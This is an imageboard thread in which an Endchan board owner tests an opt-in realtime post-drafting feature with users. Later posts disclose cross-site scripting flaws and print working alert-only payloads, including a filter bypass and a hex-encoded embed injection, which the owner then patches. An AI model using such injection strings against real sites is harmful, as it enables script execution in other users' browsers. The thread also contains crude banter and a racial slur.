/operate/ - Endchan Operations

Let us know what's up

Posting mode: Reply

Check to confirm you're not a robot
Name
Email
Subject
Comment
Password
Drawing x size canvas
File(s)

Remember to follow the rules

Max file size: 350.00 MB

Max files: 5

Max message length: 4096

Manage Board | Moderate Thread

Return | Catalog | Bottom

Expand All Images


(6.88 KB 222x222 NewFeatures-logo.png)
Realtime experiment odilitime Board owner 04/04/2017 (Tue) 16:53:25 [Preview] No. 5963
Just added a "realtime" checkbox to the thread page. This is an opt-in feature that lets you participate in seeing incoming posts (of other users that have opted-in) and broadcasts any post you draft as you make.

Thought I'd try this experiment out and see how it goes.


Anonymous 04/04/2017 (Tue) 16:57:49 [Preview] No. 5964 del
does this dick yo?


Anonymous 04/04/2017 (Tue) 17:23:22 [Preview] No. 5965 del
doesn't work with https


Anonymous 04/04/2017 (Tue) 17:36:02 [Preview] No. 5966 del
>>5965
should be fixed now


Anonymous 04/04/2017 (Tue) 17:36:05 [Preview] No. 5967 del
dicks?


Anonymous 04/04/2017 (Tue) 17:36:34 [Preview] No. 5968 del
>>5966
how does this work tho?


Anonymous 04/04/2017 (Tue) 17:36:48 [Preview] No. 5969 del
let's see


Anonymous 04/04/2017 (Tue) 17:37:50 [Preview] No. 5970 del
>>5968
you should see other people making new posts near the realtime counter


Anonymous 04/04/2017 (Tue) 17:38:01 [Preview] No. 5971 del
reel time duzin werk!
D:


Anonymous 04/04/2017 (Tue) 17:38:16 [Preview] No. 5972 del
Still can't decide whether I like this or not.


Anonymous 04/04/2017 (Tue) 17:39:06 [Preview] No. 5973 del
Does it work?


Anonymous 04/04/2017 (Tue) 17:39:19 [Preview] No. 5974 del
>>5972
Yes, it's very subjective. That's why it's an opt-in


Anonymous 04/04/2017 (Tue) 17:39:37 [Preview] No. 5975 del
>>5970
where is realtime counter?
I'm not sure where should I be lookin


Anonymous 04/04/2017 (Tue) 17:39:45 [Preview] No. 5976 del
>>5966
how do you tell if it works?


Anonymous 04/04/2017 (Tue) 17:40:33 [Preview] No. 5977 del
>>5975
bottom of the thread


Anonymous 04/04/2017 (Tue) 17:40:38 [Preview] No. 5978 del
>>5973
I literally can't tell


Anonymous 04/04/2017 (Tue) 17:41:09 [Preview] No. 5979 del
>>5977
what happens if auto is off?


Anonymous 04/04/2017 (Tue) 17:41:12 [Preview] No. 5980 del
>>5978
yea, something is broken, I'm not seeing any typing either.


Anonymous 04/04/2017 (Tue) 17:41:45 [Preview] No. 5981 del
dddddddddoooooood it doesn't work in quick reply


Anonymous 04/04/2017 (Tue) 17:42:16 [Preview] No. 5982 del
>>5981
I saw that one


Anonymous 04/04/2017 (Tue) 17:42:21 [Preview] No. 5983 del
ohay it did something?


Anonymous 04/04/2017 (Tue) 17:42:49 [Preview] No. 5984 del
it does not work in the quick reply box thingy doo


Anonymous 04/04/2017 (Tue) 17:43:11 [Preview] No. 5985 del
>>5984
testing quick reply thingy doo
can u see dis?


Anonymous 04/04/2017 (Tue) 17:44:15 [Preview] No. 5986 del
>>5985
Try it again, I looked away for a second


Anonymous 04/04/2017 (Tue) 17:44:27 [Preview] No. 5987 del
>>5985
Yea I saw it


Anonymous 04/04/2017 (Tue) 17:44:32 [Preview] No. 5988 del
does this work thingy do ayyyyyyyyyyyyyyyyyyyyyyyyy??????????????????????? AYYYYYY?????


Anonymous 04/04/2017 (Tue) 17:45:00 [Preview] No. 5989 del
we need moar tester tbh fammmmmmalam


Anonymous 04/04/2017 (Tue) 17:45:33 [Preview] No. 5990 del
>>5989
I'm working on safari fix, so you can see me type


Anonymous 04/04/2017 (Tue) 17:46:38 [Preview] No. 5991 del
testint testing 1 2 3


Anonymous 04/04/2017 (Tue) 17:47:11 [Preview] No. 5992 del
o hey I think I saw something


Anonymous 04/04/2017 (Tue) 17:47:38 [Preview] No. 5993 del
trying quick reply box thingy dooooooooooooooooooo
(someone tell me if this is working) ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo (is it working?) oooooooooooooooooooooooooooooooooooooooooooo (PLZ RESPOND) oooooooooooooooooooooooooooooooooooooooooooooooo??????


Anonymous 04/04/2017 (Tue) 17:48:07 [Preview] No. 5994 del
>>5993
Didn't see a damn thing that time


Anonymous 04/04/2017 (Tue) 17:48:24 [Preview] No. 5995 del
>>5990
>>5994
Uncaught TypeError: Cannot read property 'hasChildNodes' of undefined
at updateRealTimeCounts (megud.js:118)
at WebSocket.ws.onmessage (megud.js:153)


Anonymous 04/04/2017 (Tue) 17:48:40 [Preview] No. 5996 del
(9.62 KB 400x223 Bez tytułu.png)
heh noice


Anonymous 04/04/2017 (Tue) 17:48:52 [Preview] No. 5997 del
>>5994
>>5995
megud.js:2 Uncaught TypeError: Cannot read property 'addEventListener' of null
at attach (megud.js:2)
at megud.js:38


Anonymous 04/04/2017 (Tue) 17:49:17 [Preview] No. 5998 del
>>5996
Sweet. I'm not using the quick box tho.


Anonymous 04/04/2017 (Tue) 17:49:35 [Preview] No. 5999 del
you forgot some semicolins brah


Anonymous 04/04/2017 (Tue) 17:51:30 [Preview] No. 6000 del
doooooooood testing


Anonymous 04/04/2017 (Tue) 17:51:40 [Preview] No. 6001 del
>fuckit?


Anonymous 04/04/2017 (Tue) 17:51:54 [Preview] No. 6002 del
>>5996
Fuck it. If this becomes permanent I'm staying forever


Anonymous 04/04/2017 (Tue) 17:52:02 [Preview] No. 6003 del
>tfw lagchan


Anonymous 04/04/2017 (Tue) 17:52:13 [Preview] No. 6004 del
>>6000
dood


Anonymous 04/04/2017 (Tue) 17:52:33 [Preview] No. 6005 del
>>6004
doooooooooddddooorino?


Anonymous 04/04/2017 (Tue) 17:53:23 [Preview] No. 6006 del


Anonymous 04/04/2017 (Tue) 17:53:28 [Preview] No. 6007 del
>>6002
Although people will realize what a retard I am seeing me trying to correct all my spelling mistakes.


Anonymous 04/04/2017 (Tue) 17:53:41 [Preview] No. 6008 del
>>6006
fug, meant for >>6007


Anonymous 04/04/2017 (Tue) 17:54:34 [Preview] No. 6009 del


Anonymous 04/04/2017 (Tue) 17:54:38 [Preview] No. 6010 del
what happens when I do this?


Anonymous 04/04/2017 (Tue) 17:54:39 [Preview] No. 6011 del
>>6010
nothing


Anonymous 04/04/2017 (Tue) 17:55:07 [Preview] No. 6012 del
fuggggggggggggginwut


Anonymous 04/04/2017 (Tue) 17:55:25 [Preview] No. 6013 del
>>6014
oyy man from the future


Anonymous 04/04/2017 (Tue) 17:55:33 [Preview] No. 6014 del
>>6011
On the other site you could see the spoiler growing larger as you type.


Anonymous 04/04/2017 (Tue) 17:56:05 [Preview] No. 6015 del
>litterally a botnet in your browser yo


Anonymous 04/04/2017 (Tue) 17:56:13 [Preview] No. 6016 del
>>6014
yea and preview their images. We'll get there. Just wanted to see if people would use it first. Lemme clean up all these bugs.


Anonymous 04/04/2017 (Tue) 17:56:46 [Preview] No. 6017 del
>>6016
Ok, yeah I want it now.


Anonymous 04/04/2017 (Tue) 17:57:13 [Preview] No. 6018 del
you need to send it 1 char at at time instead of the entire thingy doooooooooooooooooooooooo in each websocket frame.


Anonymous 04/04/2017 (Tue) 17:58:59 [Preview] No. 6020 del
>>6018
yea optimizations later


Anonymous 04/04/2017 (Tue) 18:03:33 [Preview] No. 6021 del
>>6020
quick reply is working, back to the scoping problems.


Anonymous 04/04/2017 (Tue) 18:03:59 [Preview] No. 6022 del
Quick reply


Anonymous 04/04/2017 (Tue) 18:04:33 [Preview] No. 6023 del
I can see those message appearing on other boards


Anonymous 04/04/2017 (Tue) 18:04:33 [Preview] No. 6024 del
>>6015
yup, that's why it's optional


Anonymous 04/04/2017 (Tue) 18:04:35 [Preview] No. 6025 del
>>6021
I saw this from another board


Anonymous 04/04/2017 (Tue) 18:04:48 [Preview] No. 6026 del
>>6009
no clue what was going on there


Anonymous 04/04/2017 (Tue) 18:05:10 [Preview] No. 6027 del
>>5999
semicolons aren't needed


Anonymous 04/04/2017 (Tue) 18:07:50 [Preview] No. 6028 del
>>6025
yea that was the scoping problems. I think it's at least scoped to the board you're on now. Need to do thread scope next.


Anonymous 04/04/2017 (Tue) 18:35:35 [Preview] No. 6029 del
>>6028
Ok thread scoping is complete. Let me know if you guys run into any more bugs. I think it's solid.


Anonymous 04/04/2017 (Tue) 18:39:32 [Preview] No. 6030 del
>>6029
I think there's one bug with safari submit.


Anonymous 04/04/2017 (Tue) 18:39:50 [Preview] No. 6031 del
>>6030
ok that's fixed


Anonymous 04/04/2017 (Tue) 18:46:23 [Preview] No. 6032 del
Cool. I'm going to use this more often. Except when I have to type out long posts. It's weird knowing someone is watching your thought process, kek.


Anonymous 04/04/2017 (Tue) 18:46:42 [Preview] No. 6033 del
benis :-DDDDDDDDDDDDD


Anonymous 04/04/2017 (Tue) 18:47:03 [Preview] No. 6034 del
I see your benis


Anonymous 04/04/2017 (Tue) 18:47:07 [Preview] No. 6035 del
>implying benis
:-DDDDDDDDDDDDDDDDDDDDDDDDDDDDD


Anonymous 04/04/2017 (Tue) 18:47:28 [Preview] No. 6036 del
You can't see my benis, don't lie


Anonymous 04/04/2017 (Tue) 18:47:29 [Preview] No. 6037 del
I can see ur ass nigguh


Anonymous 04/04/2017 (Tue) 18:48:21 [Preview] No. 6038 del
I don't have ass, i'm skeletor


Anonymous 04/04/2017 (Tue) 19:09:30 [Preview] No. 6039 del
Ok lynx formatting is done


Anonymous 04/04/2017 (Tue) 22:01:31 [Preview] No. 6041 del
>>6039
Testan


odilitime Board owner 04/05/2017 (Wed) 01:56:16 [Preview] No. 6045 del
>>5963
Ok after some discussion, this feature radical alters the type of discussion. Just see this thread as an example of what it does.

So we're going to disable it globally. And BO can request that it be turned on if they want to have it on their boards. That way we can have more long form discussion in most of the site and a couple quicker boards for chat.


odilitime Board owner 04/05/2017 (Wed) 01:57:42 [Preview] No. 6046 del
also this is going to be open sourced. It was built to be tacked onto any IB including vichan, nntpchan or infinity.


Anonymous 04/05/2017 (Wed) 11:13:04 [Preview] No. 6047 del
(171.33 KB 640x427 IMG_6120.JPG)
This is totally........not showing anything cas of my ipad I guess.


Anonymous 04/05/2017 (Wed) 11:13:36 [Preview] No. 6048 del
Oh nevermind I see it at bottom.


Anonymous 04/05/2017 (Wed) 11:16:41 [Preview] No. 6049 del
Neat


odilitime Board owner 04/05/2017 (Wed) 13:58:55 [Preview] No. 6050 del


Anonymous 04/05/2017 (Wed) 16:50:28 [Preview] No. 6051 del
Benis in de magin' :DDDDDD


just as expected from js "programmers" Anonymous 04/05/2017 (Wed) 21:12:00 [Preview] No. 6055 del
> subblock.appendChild(document.createTextNode(data.n))
> subblock.innerHTML=lynxFormatting(data.n)

Trivial XSS: just type whatever HTML you want to inject into the browser of all the idiots that enabled this feature^Wbotnet.

For example, type: <img src="/randomBanner.js?boardUri=operate" onload="alert('odili is even worse than stephenlynx');">


odilitime Board owner 04/05/2017 (Wed) 23:47:10 [Preview] No. 6056 del
>>6055
Thanks for pointing it out. Patch has been applied.


Anonymous 04/06/2017 (Thu) 00:51:24 [Preview] No. 6057 del
Ah, yes. Regex, a javascript programmer's best friend.

Try again: <<foo>img src="/randomBanner.js?boardUri=operate" onload="alert('regex ftw ;)');">


odilitime Board owner 04/06/2017 (Thu) 01:12:44 [Preview] No. 6058 del
>>6057
Good catch. Yea regex isn't really going to be a solution because I'd need to parse how each browser parses. It's just not practical.

Fixed with some encoding. How did I do?


Anonymous 04/07/2017 (Fri) 00:05:34 [Preview] No. 6071 del
>>6058
>Fixed

You sure about that, mate?

Hex-encoded, in case stephenlynx also fucked up:
5b796f75747562655d5b6e69636f6e69636f5d5b2f6e69636f6e69636f5d
206f6e6d6f7573656d6f76653d616c6572742827796f75262333343b7265
262333323b676f6e6e61262333323b6b656570262333323b6f6e26233332
3b6c6f73696e672c262333323b6d6174652729207374796c653d64697370
6c61793a626c6f636b3b706f736974696f6e3a6162736f6c7574653b746f
703a3070783b6c6566743a3070783b77696474683a3235303070783b6865
696768743a3235303070785b2f796f75747562655d


Plaintext:
https://youtube.com/watch?v=http://www.nicovideo.jp/watch/[/niconico] onmousemove=alert&40;'you&#34;re&#32;gonna&#32;keep&#32;on&#32;losing,&#32;mate'&41; style=display:block;position:absolute;top:0px;left:0px;width:2500px;height:2500px [<a href="https://youtube.com/watch?v=[niconico] [Embed] onmousemove=alert&40;'you&#34;re&#32;gonna&#32;keep&#32;on&#32;losing,&#32;mate'&41; style=display:block;position:absolute;top:0px;left:0px;width:2500px;height:2500px">Embed]


Note 1: This quite depends on the quirks-mode parsing of the browser. This XSS works in latest Tor Browser.

Note 2: This one actually took me a little while to make it effective. Since it's getting more complicated and you don't seem to be getting the message, the next one I post will be an actual exploit. But, you're welcome to keep playing if you want.
Edited last time by odilitime on 04/07/2017 (Fri) 00:48:37.


Anonymous 04/07/2017 (Fri) 00:12:03 [Preview] No. 6072 del
>>6071

>in case stephenlynx also fucked up

lolz, it seems he totally did.

So here you have a javascript-less XSS in effect, without even trying. ;)


Anonymous 04/07/2017 (Fri) 00:23:49 [Preview] No. 6073 del
>>6072

I meant of course megud-javascript-less, you understand me.


Anonymous 04/07/2017 (Fri) 00:39:11 [Preview] No. 6074 del
>>6071
It doesn`t seem to work on vanilla lynxchan.

http://lynxhub.com/test/res/26.html

I copy and pasted from 'https' to 'Embed]


odilitime Board owner 04/07/2017 (Fri) 00:51:08 [Preview] No. 6075 del
>>6071
ok that was an addon that was causing it. All patched up.

Had to edit the post to trigger the rebuild. After the rebuild I don't get the error but can't be sure, as we can't really tell what you put in for input.

Is it still broken?


Anonymous 04/07/2017 (Fri) 00:57:01 [Preview] No. 6076 del
>>6071
it worked in chrome too

>>6072
I'm not seeing any problems with the hex version at all? What would decode the hex?

>>6073
I understood from the original message. The backend daemon is what processes the bbcode stuff.


Anonymous 04/07/2017 (Fri) 01:07:25 [Preview] No. 6077 del
>>6074
>I copy and pasted from 'https' to 'Embed]

>>6075
>as we can't really tell what you put in for input.

>>6076
>I'm not seeing any problems with the hex version at all? What would decode the hex?

Are you people joking? That's why I put the encoded payload. Also, if you can't into hex-encoding, then you probably shouldn't be poking here.

>>6074
>It doesn`t seem to work on vanilla lynxchan.

Dunno. I said "seems", maybe it was not stephenlynx? Just doubly odili?


Anonymous 04/07/2017 (Fri) 01:11:15 [Preview] No. 6078 del
>>6077
Guess it's fixed and you can't do it any more


Anonymous 04/07/2017 (Fri) 01:16:11 [Preview] No. 6079 del
>>6078
I didn`t change a thing so...


odilitime Board owner 04/07/2017 (Fri) 01:17:15 [Preview] No. 6080 del
>>6079
we did and we no longer get the alerts


Anonymous 04/07/2017 (Fri) 01:24:18 [Preview] No. 6081 del
>>6080
I was talking about vanilla lynxchan.


Anonymous 04/07/2017 (Fri) 01:39:43 [Preview] No. 6082 del
>>6081
no one was talking to you. lrn2read


Anonymous 04/07/2017 (Fri) 02:16:56 [Preview] No. 6083 del


Anonymous 04/07/2017 (Fri) 02:22:09 [Preview] No. 6084 del
>>6083
it's already delivered


Anonymous 04/07/2017 (Fri) 02:27:52 [Preview] No. 6085 del
>>6084

I'm not a programmer but as I understood >>6071 was attacking the realtime thing
but it just hit the board as well, I am wrong?

I see no fix here: https://gitgud.io/InfinityNow/megud/commits/master

I would test it myself but I don't know how without being attacked...


Anonymous 04/07/2017 (Fri) 02:28:45 [Preview] No. 6086 del
>>6084
Yea, I can confirm, it's not happening any more in the latest tor browser


Anonymous 04/07/2017 (Fri) 02:30:49 [Preview] No. 6087 del
>>6085
it was but also the backend, because the bug was copied to the realtime area from the backend.

>I see no fix
correct, we haven't posted it there yet, we want to confirm it is fixed.

>I would test it myself
Me too, but the correct input isn't clear



Top | Return | Catalog | Post a reply